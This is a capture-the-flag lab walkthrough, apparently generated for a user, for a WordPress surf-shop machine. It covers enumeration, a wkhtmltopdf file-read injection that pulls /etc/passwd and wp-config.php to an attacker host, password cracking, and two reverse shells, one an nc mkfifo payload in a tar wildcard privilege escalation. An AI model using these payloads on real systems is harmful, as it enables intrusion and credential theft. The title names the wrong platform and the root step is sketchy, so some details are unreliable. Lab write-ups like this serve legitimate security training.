Here’s your walkthrough for the “Sea CTF HackTheBox” under your name:
SCANNING
Port Scanning
We begin by scanning all ports on the target machine:
nmap -A -p- --min-rate 20000 10.10.165.149
Open Ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
SSH and HTTP are running. We’ll start by looking at the web service.
ENUMERATION
Manual Enumeration
Checking port 80 reveals a HTTP service with a notable header for “X-Backend-Server”:
curl -I http://10.10.165.149/
Response:
X-Backend-Server: seasurfer.thm
I added seasurfer.thm
to /etc/hosts
. The vhost turns out to be a WordPress site about a surfer shop. The “About” page lists employees, including Kyle, the sysadmin. Kyle appears to be a good candidate for further investigation, as indicated by the footer “Made by Kyle! ❤”.
WordPress Enumeration
Running wpscan
reveals Kyle as a potential username:
wpscan --url http://seasurfer.thm/ -e u
[+] User Found: kyle
Directory Enumeration
Using gobuster
, I find an interesting directory:
gobuster dir -u http://seasurfer.thm/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 30
/adminer (Status: 301)
Subdomain Enumeration
Subdomain enumeration with ffuf
shows:
ffuf -v -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://seasurfer.thm -H "Host: FUZZ.seasurfer.thm"
internal.seasurfer.thm
Adding this subdomain to /etc/hosts
reveals a page generating PDFs. Let’s check if it’s vulnerable to HTML injection by adding HTML to the comment field.
PDF Metadata
Checking the PDF metadata using exiftool
:
exiftool /root/Downloads/20082022-6TL7eVCWqFKcL7bEVbdc.pdf
The response shows the PDF is generated by wkhtmltopdf
, which may be vulnerable to SSRF and LFI.
EXPLOITATION
LFI Exploit
I create a PHP script to exfiltrate files:
<?php header('location:file://'.$_REQUEST['x']); ?>
Hosting it locally, I inject the payload into the receipt generation form:
<iframe src="http://10.8.88.207:9001/exfiltrate.php?x=/etc/passwd"></iframe>
This successfully retrieves /etc/passwd
. Then, I target /var/www/wordpress/wp-config.php
to get database credentials.
Adminer Login
Using the credentials on the adminer
page:
seasurfer.thm/adminer/
I successfully log in and retrieve Kyle’s hashed password. Using hashcat
and rockyou.txt
, I brute force the hash:
hashcat -m 400 kyli_hash /usr/share/wordlists/rockyou.txt
With the cracked password, I log in as Kyle on WordPress.
Reverse Shell
I place a PHP reverse shell in the 404 template and trigger it:
nc -lvnp 444
I get access as www-data
.
PRIVILEGE ESCALATION
User Privilege Escalation
I find a backup script in /var/www/internal/maintenance
that runs every minute. Exploiting a wildcard vulnerability in tar
, I craft a reverse shell payload:
echo "mkfifo /tmp/lhennp; nc 10.8.88.207 5555 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
Once executed, I get a reverse shell as Kyle.
Root Privilege Escalation
By exploiting pam_ssh_agent_auth
, I gain root access:
sudo su
Finally, I read the root.txt
flag:
cat /root/root.txt
Congratulations! You’ve completed the room.